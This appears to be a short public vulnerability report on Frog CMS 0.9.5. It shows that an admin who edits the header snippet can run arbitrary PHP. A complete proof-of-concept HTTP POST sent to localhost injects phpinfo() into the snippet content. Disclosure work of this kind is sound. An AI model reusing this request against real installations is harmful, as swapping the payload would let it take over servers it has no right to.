Frog CMS 0.9.5 has a remote code execute Vulnerability

[howchen]

There is a code execute vunlenrable when logined as a admin and edit the header and footer snippet

POST:

POST /FrogCMS-master/admin/?/snippet/edit/1 HTTP/1.1
Host: localhost:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8899/FrogCMS-master/admin/?/snippet/edit/1
Content-Type: application/x-www-form-urlencoded
Content-Length: 989
Cookie: PHPSESSID=3gjbigesovuba4o5i53a4b9kh0; frog_auth_user=exp%3D1537932307%26id%3D1%26digest%3D58e60ac75cb6c2814168a58a57c1dc93
Connection: close
Upgrade-Insecure-Requests: 1

snippet%5Bname%5D=header&snippet%5Bfilter_id%5D=&snippet%5Bcontent%5D=%3Cdiv+id%3D%22header%22%3E%0D%0A++%3Ch1%3E%3Ca+href%3D%22%3C%3Fphp+echo+URL_PUBLIC%3B+%3F%3E%22%3EFrog%3C%2Fa%3E+%3Cspan%3Econtent+management+simplified%3C%2Fspan%3E%3C%2Fh1%3E%0D%0A++%3Cdiv+id%3D%22nav%22%3E%0D%0A++++%3Cul%3E%0D%0A++++++%3Cli%3E%3Ca%3C%3Fphp+echo+url_match%28%27%2F%27%29+%3F+%27+class%3D%22current%22%27%3A+%27%27%3B+%3F%3E+href%3D%22%3C%3Fphp+echo+URL_PUBLIC%3B+%3F%3E%22%3EHome%3C%2Fa%3E%3C%2Fli%3E%0D%0A%3C%3Fphp+foreach%28%24this-%3Efind%28%27%2F%27%29-%3Echildren%28%29+as+%24menu%29%3A+%3F%3E%0D%0A++++++%3Cli%3E%3C%3Fphp+echo+%24menu-%3Elink%28%24menu-%3Etitle%2C+%28in_array%28%24menu-%3Eslug%2C+explode%28%27%2F%27%2C+%24this-%3Eurl%29%29+%3F+%27+class%3D%22current%22%27%3A+null%29%29%3B+phpinfo%28%29+%3F%3E%3C%2Fli%3E%0D%0A%3C%3Fphp+endforeach%3B+%3F%3E+%0D%0A++++%3C%2Ful%3E%0D%0A++%3C%2Fdiv%3E+%3C%21--+end+%23navigation+--%3E%0D%0A%3C%2Fdiv%3E+%3C%21--+end+%23header+--%3E&commit=Save

and then: visite: http://localhost/FrogCMS/
the phpinfo() execute result will be return with the response data
BTW, you may need to watch the response information with burpsuit or others